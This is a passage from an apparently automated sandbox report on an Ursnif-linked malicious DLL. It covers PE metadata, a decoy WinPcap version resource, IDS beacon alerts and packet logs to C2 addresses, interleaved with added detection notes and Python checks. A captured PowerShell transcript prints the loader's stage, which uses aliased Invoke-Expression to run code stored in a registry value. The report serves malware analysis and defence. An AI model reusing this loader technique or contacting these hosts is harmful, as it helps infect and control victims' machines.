                                    Entropy (8bit):5.302952125242329
                                    Encrypted:false
                                    SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923filzxs7+AEszI923fiW9n:p37Lvkmb6KzKWZE2B9
                                    MD5:4023D8D689AEED7AD6BA5A8D55E73792
                                    SHA1:624E325D40A40C0E16FDC537DB9A1E37319394F2
                                    SHA-256:128109BC2099C5A84A35768FA9F4A64DBF7920B09E1BE9312703554DC63FCD10
                                    SHA-512:F63FE1FD497662D350C1A921600CE34A6088258938A6809A5EBC2C00275F81351E6922CDCBFF65891B5DD376865C8531E0D15FDFE7E3526530AAFA7385B7223C
                                    Malicious:false
                                    Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\f2vxj03f\f2vxj03f.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\f2vxj03f\f2vxj03f.0.cs"
                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):3584
                                    Entropy (8bit):2.6409513225199364
                                    Encrypted:false
                                    SSDEEP:24:etGSK8+mUE7R853RY0kCG7J+4I4tkZfHqug3DZ0WI+ycuZhNXakSZPNnq:6EXE7S50WJHq3ZX1ulXa3bq
                                    MD5:67D7212A2B15084D3B6FA70F16AFDD6C
                                    SHA1:743A096BCF4E42AB064F5139488194811EF23782
                                    SHA-256:878B7E2B251C062F95F45B18FE7248D95EA378707CFDFFB0A6043B134B463761
                                    SHA-512:992DB5E31B77859DC273C344444A5A93963F16BA9796F261197E2D4F9FBF6AC194DD29A7261D5A53A2BE79226F9E547E1D7EEF0456EC50CAEAF1ACFDE033F848
                                    Malicious:false
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Rcb...........!.................$... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..d.............................................................(....*BSJB............v4.0.30319......l...H...#~......D...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................6./...............%.......................".............. =............ J............ ].....P ......h.........n.....r.....}.....................h. ...h...!.h.%...h.......*.....3.8.....=.......J.......]...........
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                                    Category:modified
                                    Size (bytes):868
                                    Entropy (8bit):5.35568353482419
                                    Encrypted:false
                                    SSDEEP:12:xKIR37Lvkmb6KzKWZE2B4KaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:AId3ka6KzrE2WKaM5DqBVKVrdFAMBJTH
                                    MD5:D8D7A68D20996F61BC72BD192FB1D83C
                                    SHA1:92F7412CE0E44D88FEE4D91B1003D435385BF7EE
                                    SHA-256:1D14F98EF405654C358851C49324CDBD3FABAE5F2213B38D652C01CE24AA01B4
                                    SHA-512:A51C5EC8636040C299D6F6A2E8053B47AC6EF5B3830CE875257F27FC98448FC9195A317E723A793B0115E091BA49A3056667FA8E3605D89B97FA3B10599BFA9F
                                    Malicious:false
                                     Preview (line breaks restored):
                                     C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\f2vxj03f\f2vxj03f.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\f2vxj03f\f2vxj03f.0.cs"

                                     Microsoft (R) Visual C# Compiler version 4.7.3056.0
                                     for C# 5
                                     Copyright (C) Microsoft Corporation. All rights reserved.

                                     This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):1357
                                    Entropy (8bit):5.3549203065751
                                    Encrypted:false
                                    SSDEEP:24:BxSABDvBBRJNzx2DOXUWndxSXLCHgo4qWnHjeTKKjX4CIym1ZJXLdxSXLCHgo4Ui:BZJv/TZoO9pb4tnqDYB1Zvpb4iZZ+
                                    MD5:8F2C181896931A924F0038005408C3D7
                                    SHA1:DB9E8BEF4B235EE727DB7754F9B8884403C420CB
                                    SHA-256:FF8A78A7E137AE094866B5F6C45363A3AFDC5E3E7069033961BFCC760ED2B1DF
                                    SHA-512:634578FD917A2633DD4E58F706DC141E71BE8B88E56724D05817BE8AACA4951376C6E1A8054FC2F7864E8A6D9E16A97496DCAD6196A6121A871BC09D6DB193B0
                                    Malicious:false
                                     Preview (line breaks restored; the transcript is cut off at the end as in the report):
                                     **********************
                                     Windows PowerShell transcript start
                                     Start time: 20220422181322
                                     Username: computer\user
                                     RunAs User: computer\user
                                     Configuration Name: 
                                     Machine: 701188 (Microsoft Windows NT 10.0.17134.0)
                                     Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe new-alias -name pfemrdpi -value gp; new-alias -name ndgrwui -value iex; ndgrwui ([System.Text.Encoding]::ASCII.GetString((pfemrdpi HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E).UrlsReturn))
                                     Process ID: 6092
                                     PSVersion: 5.1.17134.1
                                     PSEdition: Desktop
                                     PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1
                                     BuildVersion: 10.0.17134.1
                                     CLRVersion: 4.0.30319.42000
                                     WSManStackVersion: 3.0
                                     PSRemotingProtocolVersion: 2.3
                                     SerializationVersion: 1.1.0.1
                                     **********************
                                     **********************
                                     Command start time: 20220422181322
                                     **********************
                                     PS>new-alias -name pfemrdpi -value gp; new-alias -name ndgrwui -value iex; ndgrwui ([S
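The Host Application line in the transcript above is the loader's PowerShell stage in full: it renames the built-in aliases gp (Get-ItemProperty) and iex (Invoke-Expression) to random words, reads the UrlsReturn value under HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E, decodes it as ASCII and evaluates it. Keyword matching on "iex" or "Invoke-Expression" misses this; resolving aliases first does not. The script below is an added Python example, not part of the Joe Sandbox report or of the sample, that runs that resolution over command lines or transcript entries, flags Invoke-Expression fed from a registry read, and extracts the key and value name for triage. The alias table is a small subset of PowerShell's defaults (an assumption, enough for this demo); the first sample line is the transcript's command and the second is a benign line constructed for contrast.

```python
import re

# Constructed inputs: the first is the Host Application command recorded in
# the transcript above; the second is a benign line written for contrast.
SAMPLE_LINES = [
    r"new-alias -name pfemrdpi -value gp; new-alias -name ndgrwui -value iex; "
    r"ndgrwui ([System.Text.Encoding]::ASCII.GetString((pfemrdpi HKCU:Software\AppDataLow"
    r"\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E).UrlsReturn))",
    r"new-alias -name lsr -value Get-ChildItem; lsr C:\Temp | Where-Object Length -gt 1000",
]

# Subset of PowerShell's built-in aliases; assumed sufficient for this demo.
DEFAULT_ALIASES = {"iex": "Invoke-Expression", "gp": "Get-ItemProperty",
                   "nal": "New-Alias", "sal": "Set-Alias"}

# new-alias/set-alias (or their own aliases) with or without -name/-value.
ALIAS_DEF_RE = re.compile(
    r'\b(?:new-alias|set-alias|nal|sal)\s+(?:-name\s+)?([\w-]+)\s+(?:-value\s+)?([\w-]+)',
    re.IGNORECASE)
# A registry provider path used as a command argument, and the property
# read from the returned object, e.g. (gp HKCU:\...\Key).Value
REG_READ_RE = re.compile(r'(HK(?:CU|LM|CR|U|CC):[^\s)]+)\)\s*\.(\w+)', re.IGNORECASE)
WORD_RE = re.compile(r'[A-Za-z][\w-]*')

def resolve(word: str, aliases: dict, max_hops: int = 8) -> str:
    """Follow alias-of-alias chains (ndgrwui -> iex -> Invoke-Expression)."""
    for _ in range(max_hops):
        nxt = aliases.get(word.lower())
        if nxt is None:
            return word
        word = nxt
    return word

def analyze(line: str) -> dict:
    """Flag a command line that launders Invoke-Expression through aliases
    and feeds it data read from the registry."""
    aliases = dict(DEFAULT_ALIASES)
    defined = {}
    for name, value in ALIAS_DEF_RE.findall(line):
        aliases[name.lower()] = value
        defined[name] = value
    # Resolve every bare word; cheap, and catches an alias wherever it is used.
    canonical = {resolve(w, aliases).lower() for w in WORD_RE.findall(line)}
    reg = REG_READ_RE.search(line)
    finding = {
        "aliases_defined": defined,
        "invoke_expression": "invoke-expression" in canonical,
        "registry_read": "get-itemproperty" in canonical and reg is not None,
        "registry_path": reg.group(1) if reg else None,
        "value_name": reg.group(2) if reg else None,
    }
    finding["flagged"] = finding["invoke_expression"] and finding["registry_read"]
    return finding

if __name__ == "__main__":
    for line in SAMPLE_LINES:
        f = analyze(line)
        print("FLAGGED" if f["flagged"] else "ok     ", f["aliases_defined"],
              f["registry_path"], f["value_name"])
```

For production use, feed this the ScriptBlock text from Event ID 4104 rather than the transcript, and seed DEFAULT_ALIASES from `Get-Alias` on a reference host so the table is complete; the registry path and value name the function returns are exactly what an analyst needs to pull the next stage off the infected machine.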
                                    File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                    Entropy (8bit):6.116107290295018
                                    TrID:
                                    • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                    • Generic Win/DOS Executable (2004/3) 0.20%
                                    • DOS Executable Generic (2002/1) 0.20%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:nhLAwAo49f.dll
                                    File size:641494
                                    MD5:117d2886bf0e722b91c0613f337e97da
                                    SHA1:ca858266bb3a6c30bd798bd52ec9ad5f5992c999
                                    SHA256:5460cbecf56cf0527a162da6e9232c055912ae695990c1894a32b08055f45d37
                                    SHA512:bbbcef3522fbfac490a21803c5fab3968f18b5e9ed41db45f4617de4db016a11aae7a8c18ecf6bd189257e1a8e7cf0743d2bd1ecb5ccecf1af1160b4f69dbe2f
                                    SSDEEP:12288:+w1lEKREbddtOYRbHzcPwka1dCjc3N8Zlh:+w1lEKOpuYxiwkkgjAN8Z/
                                    TLSH:ABD4BD1A029B2102EBB6CE78A751636C55170CE09B01E2CFC9190DA395E35FBF4FA5ED
                                    File Content Preview:MZ......................@...................................P...........!..L.!This program cannot be run in DOS mode....$........9.(.X.{.X.{.X.{...{0X.{...{.Y.{G.-{.X.{~.({.Y.{..M{.X.{K..z.X.{..r{}Y.{.X.{PX.{K..z.Y.{.!8{.Y.{Rich.X.{.......................
                                    Icon Hash:74f0e4ecccdce0e4
                                    Entrypoint:0x401023
                                    Entrypoint Section:.text
                                    Digitally signed:true
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                                    DLL Characteristics:TERMINAL_SERVER_AWARE
                                     Time Stamp:0x3F4B4692 [Tue Aug 26 11:37:54 2003 UTC]
                                     Note: this link timestamp predates every toolchain recorded in the Programming Language list below (VS2010 through VS2015 compiler, linker and resource builds), so it cannot be the real build time; treat it as forged and use the first-seen date of the file instead.
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:5
                                    OS Version Minor:0
                                    File Version Major:5
                                    File Version Minor:0
                                    Subsystem Version Major:5
                                    Subsystem Version Minor:0
                                    Import Hash:fd1c62e6f93e304a27347077f6d2b44c
                                     Signature Valid:
                                     Signature Issuer:
                                     Signature Validation Error:
                                     Error Number:
                                     Not Before, Not After
                                       Subject Chain
                                         Version:
                                         Thumbprint MD5:
                                         Thumbprint SHA-1:
                                         Thumbprint SHA-256:
                                         Serial:
                                     Note: "Digitally signed: true" above reflects only a non-zero IMAGE_DIRECTORY_ENTRY_SECURITY entry, and the data directory table below shows that entry as 0x1000 with size 0x1, inside .text. A WIN_CERTIFICATE header alone is 8 bytes and the certificate table must sit outside the sections, so no Authenticode signature can be parsed from this entry, which is why every signature field here is empty. Treat the file as unsigned.
                                        Instruction
                                        jmp 00007F5880CB05CDh
                                        jmp 00007F5880CE0D38h
                                        jmp 00007F5880CB02B3h
                                        jmp 00007F5880CAFF6Eh
                                        jmp 00007F5880CB0389h
                                        jmp 00007F5880CAFDC4h
                                        jmp 00007F5880CE61AFh
                                        jmp 00007F5880CAFECAh
                                        jmp 00007F5880CD9525h
                                        jmp 00007F5880CE93E0h
                                        jmp 00007F5880CE504Bh
                                        jmp 00007F5880CEA5A6h
                                        jmp 00007F5880CAFE41h
                                        jmp 00007F5880CDA65Ch
                                        jmp 00007F5880CECC77h
                                        jmp 00007F5880CE3F22h
                                        jmp 00007F5880CDB6DDh
                                        jmp 00007F5880CB02F8h
                                        jmp 00007F5880CEFC13h
                                        jmp 00007F5880CB001Eh
                                        jmp 00007F5880CEB7D9h
                                        jmp 00007F5880CE1E04h
                                        jmp 00007F5880CDC6EFh
                                        jmp 00007F5880CEB5FAh
                                        jmp 00007F5880CB0295h
                                        jmp 00007F5880CE71D0h
                                        jmp 00007F5880CDEC2Bh
                                        jmp 00007F5880CEED36h
                                        jmp 00007F5880CDDAF1h
                                        jmp 00007F5880CB028Ch
                                        jmp 00007F5880CAFE07h
                                        jmp 00007F5880CE8312h
                                        jmp 00007F5880CEDC8Dh
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        Programming Language:
                                        • [ C ] VS2013 build 21005
                                        • [RES] VS2015 build 23026
                                        • [LNK] VS2013 UPD4 build 31101
                                        • [C++] VS2010 SP1 build 40219
                                        • [IMP] VS2012 UPD2 build 60315
                                        • [RES] VS2008 build 21022
                                        • [EXP] VS2015 UPD3.1 build 24215
                                        • [ C ] VS2012 UPD1 build 51106
                                        • [C++] VS2015 UPD3.1 build 24215
                                         Name | Virtual Address | Virtual Size | Is in Section
                                         IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                         IMAGE_DIRECTORY_ENTRY_IMPORT | 0x97000 | 0xc8 | .idata
                                         IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x98000 | 0x703 | .rsrc
                                         IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                         IMAGE_DIRECTORY_ENTRY_SECURITY | 0x1000 | 0x1 | .text
                                         IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x99000 | 0x46b8 | .reloc
                                         IMAGE_DIRECTORY_ENTRY_DEBUG | 0x41001 | 0x38 | .rdata
                                         IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                         IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                         IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                         IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                         IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                         IMAGE_DIRECTORY_ENTRY_IAT | 0x9731c | 0x254 | .idata
                                         IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                         IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                         IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
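The data directory table above is where the "Digitally signed: true" verdict comes from: IMAGE_DIRECTORY_ENTRY_SECURITY is 0x1000 with size 0x1, and the tool reports it as lying in .text. Unlike the other directories, the first field of the SECURITY entry is a file offset, the table it points at starts with an 8-byte WIN_CERTIFICATE header whose dwLength must equal the directory size, and the table is never mapped into a section. A one-byte entry inside the code section satisfies none of that. The following Python check is an added example, not part of the Joe Sandbox report or of the sample: it parses a PE image in memory with only the standard library and classifies the security directory as unsigned, bogus or a real certificate table. `build_pe` constructs a minimal PE32 fixture with one .text section so the check runs offline; its directory values (0x1000, 0x1) mirror the report, and the 2003 timestamp is reused as the fixture's TimeDateStamp. Run it on the actual file with `check_security_dir(open(path, "rb").read())`.

```python
import struct

DIR_SECURITY = 4      # index of IMAGE_DIRECTORY_ENTRY_SECURITY
WIN_CERT_HDR = 8      # dwLength(4) + wRevision(2) + wCertificateType(2)

def check_security_dir(pe: bytes) -> dict:
    """Classify the Authenticode directory of a PE image held in memory.

    The SECURITY entry's first field is a file offset, not an RVA, and the
    certificate table it names must sit outside every section.
    """
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    # COFF header: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    _, nsec, tstamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", pe, e_lfanew + 4)
    opt = e_lfanew + 24
    magic = struct.unpack_from("<H", pe, opt)[0]
    dirs = opt + (96 if magic == 0x10B else 112)          # PE32 vs PE32+
    off, size = struct.unpack_from("<II", pe, dirs + 8 * DIR_SECURITY)
    sections = []
    for i in range(nsec):
        name, _, _, raw_size, raw_ptr = struct.unpack_from("<8sIIII", pe, opt + opt_size + 40 * i)
        sections.append((name.rstrip(b"\0").decode("ascii", "replace"), raw_ptr, raw_size))

    result = {"timestamp": tstamp, "offset": off, "size": size, "problems": []}
    problems = result["problems"]
    if size == 0:
        result["verdict"] = "unsigned"
        return result
    if size < WIN_CERT_HDR:
        problems.append("size smaller than a WIN_CERTIFICATE header")
    if off % 8:
        problems.append("offset not 8-byte aligned")
    if off + size > len(pe):
        problems.append("table extends past end of file")
    elif size >= WIN_CERT_HDR:
        dw_length = struct.unpack_from("<I", pe, off)[0]
        if dw_length != size:
            problems.append("dwLength does not match directory size")
    for name, raw_ptr, raw_size in sections:
        if raw_ptr <= off < raw_ptr + raw_size:
            problems.append(f"table lies inside section {name}")
    result["verdict"] = "bogus security directory" if problems else "certificate table present"
    return result

def build_pe(security=(0, 0), cert_blob=b"") -> bytes:
    """Constructed minimal PE32 with one .text section; a test fixture, not the sample."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                       # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0x3F4B4692, 0, 0, 224, 0x2102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                        # PE32 magic
    struct.pack_into("<I", opt, 28, 0x400000)                    # ImageBase
    struct.pack_into("<II", opt, 32, 0x1000, 0x200)              # Section/File alignment
    struct.pack_into("<I", opt, 92, 16)                          # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + 8 * DIR_SECURITY, *security)
    # .text: VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData, ..., Characteristics
    text = struct.pack("<8sIIIIIIHHI", b".text", 0x1000, 0x1000, 0x1000, 0x400,
                       0, 0, 0, 0, 0x60000020)
    header = bytes(dos) + b"PE\0\0" + coff + bytes(opt) + text
    return header.ljust(0x400, b"\0") + b"\xCC" * 0x1000 + cert_blob

if __name__ == "__main__":
    print(check_security_dir(build_pe(security=(0x1000, 0x1))))   # the report's values
    blob = struct.pack("<IHH", 0x210, 0x200, 2) + b"\0" * (0x210 - 8)
    print(check_security_dir(build_pe(security=(0x1400, 0x210), cert_blob=blob)))
```

Verdict "certificate table present" only means the table is well formed; chain and hash validation still need a proper Authenticode verifier. The point of the check is the other direction: a sandbox "signed" flag that this function turns into "bogus security directory" should be read as an evasion attempt, not as provenance.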
                                         Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                         .text | 0x1000 | 0x3f170 | 0x40000 | False | 0.371898651123 | data | 4.44682748237 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                         .rdata | 0x41000 | 0x4001b | 0x41000 | False | 0.805322265625 | data | 7.15716511851 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                         .data | 0x82000 | 0x14957 | 0x12000 | False | 0.179578993056 | data | 5.40188601701 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                         .idata | 0x97000 | 0xadd | 0x1000 | False | 0.217041015625 | data | 2.64887682924 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                         .rsrc | 0x98000 | 0x703 | 0x1000 | False | 0.1220703125 | data | 1.10395588442 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                         .reloc | 0x99000 | 0x53a5 | 0x6000 | False | 0.152099609375 | data | 5.13419580461 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                         Note: .rdata is the largest section (0x41000 bytes raw) and has an entropy of 7.16 against 4.45 for the code in .text; that is the profile of an encrypted payload the loader decrypts at runtime, which matches the injection behaviour listed in the signatures.
                                         Name | RVA | Size | Type | Language | Country
                                         RT_VERSION | 0x98170 | 0x3d0 | data | |
                                         DLL | Import
                                         WINSPOOL.DRV | GetPrinterDriverDirectoryA, GetPrinterDataExW, DeletePrinterConnectionW, FindFirstPrinterChangeNotification, FindClosePrinterChangeNotification
                                         msvcrt.dll | toupper
                                         USER32.dll | DestroyIcon, GetWindowTextA, DrawFrameControl, LoadAcceleratorsA, GetTitleBarInfo, GetMessageExtraInfo, DrawTextW
                                         OLEAUT32.dll | LHashValOfNameSysA
                                         SHELL32.dll | FindExecutableW
                                         KERNEL32.dll | lstrlenW, GetBinaryTypeW, GetModuleFileNameW, GetModuleHandleW, GetLastError, GetNLSVersion, GetSystemWindowsDirectoryA, lstrcpynA, GetCurrentThread, GetDefaultCommConfigW, ExitProcess, GetSystemDirectoryW, GetCommandLineA, FindNextVolumeMountPointW, DeleteCriticalSection, LockResource, GetCurrentDirectoryA, GetDefaultCommConfigA
                                         Secur32.dll | InitializeSecurityContextW
                                         ADVAPI32.dll | GetOldestEventLogRecord, FindFirstFreeAce, GetLengthSid, EnumServicesStatusW, RegOpenKeyA, GetPrivateObjectSecurity, GetSecurityDescriptorOwner
                                         GDI32.dll | GetCurrentPositionEx, GetBrushOrgEx, GetTextExtentExPointW
                                         Description | Data
                                         LegalCopyright | Copyright 2005-2007 CACE Technologies. Copyright 2003-2005 NetGroup, Politecnico di Torino.
                                         InternalName | rpcapd
                                         FileVersion | 4.0.0.1040
                                         CompanyName | CACE Technologies
                                         LegalTrademarks |
                                         ProductName | WinPcap
                                         ProductVersion | 4.0.0.1040
                                         FileDescription | Remote Packet Capture Daemon
                                         Build Description |
                                         OriginalFilename | rpcapd.exe
                                         Translation | 0x0000 0x04b0
                                         Note: the version resource is copied from WinPcap's rpcapd.exe. The sample is a DLL, not an executable, and its import table above contains nothing related to packet capture, so these strings are a decoy rather than provenance; do not whitelist on CompanyName or ProductName.
                                         Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                         04/22/22-18:13:04.407179 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49773 | 80 | 192.168.2.5 | 146.70.35.138
                                         04/22/22-18:12:43.292918 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49758 | 80 | 192.168.2.5 | 13.107.42.16
                                         04/22/22-18:13:05.383399 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49773 | 80 | 192.168.2.5 | 146.70.35.138
                                         04/22/22-18:13:03.616504 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49773 | 80 | 192.168.2.5 | 146.70.35.138
                                         Note: SIDs 2033203 and 2033204 match the structure of the beacon URI, not a specific host. Three of the four alerts belong to the single session with 146.70.35.138 on port 49773; the earlier hit toward 13.107.42.16 on port 49758 should be confirmed against the HTTP request itself before that address is treated as C2 infrastructure.
                                         Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                         Apr 22, 2022 18:13:03.589531898 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138
                                         Apr 22, 2022 18:13:03.615566015 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5
                                         Apr 22, 2022 18:13:03.615808964 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138
                                         Apr 22, 2022 18:13:03.616503954 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138
                                         Apr 22, 2022 18:13:03.643296957 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5
                                         Apr 22, 2022 18:13:03.994354963 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5
                                         Apr 22, 2022 18:13:03.994388103 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5
                                         Apr 22, 2022 18:13:03.994402885 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5
                                         Apr 22, 2022 18:13:03.994417906 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5
                                         Apr 22, 2022 18:13:03.994436026 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5
                                         Apr 22, 2022 18:13:03.994443893 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138
                                         Apr 22, 2022 18:13:03.994450092 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5
                                         Apr 22, 2022 18:13:03.994469881 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138
                                         Apr 22, 2022 18:13:03.994502068 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138
                                         Apr 22, 2022 18:13:03.994559050 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5
                                         Apr 22, 2022 18:13:03.994601011 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138
                                         Apr 22, 2022 18:13:03.994689941 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5
                                         Apr 22, 2022 18:13:03.994702101 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5
                                         Apr 22, 2022 18:13:03.994748116 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138
                                         Apr 22, 2022 18:13:03.994818926 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5
                                         Apr 22, 2022 18:13:03.994837046 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5
                                         Apr 22, 2022 18:13:03.994848967 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5
                                         Apr 22, 2022 18:13:03.994856119 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138
                                         Apr 22, 2022 18:13:03.994877100 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138
                                         Apr 22, 2022 18:13:03.994941950 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5
                                        Apr 22, 2022 18:13:03.994978905 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:03.995069981 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:03.995109081 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.034974098 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.034996033 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.035008907 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.035026073 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.035039902 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.035048962 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.035093069 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.035511017 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.035528898 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.035540104 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.035558939 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.035586119 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.035588026 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.035598993 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.035643101 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.035742044 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.035761118 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.035772085 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.035789013 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.035806894 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.035816908 CEST4977380192.168.2.5146.70.35.138
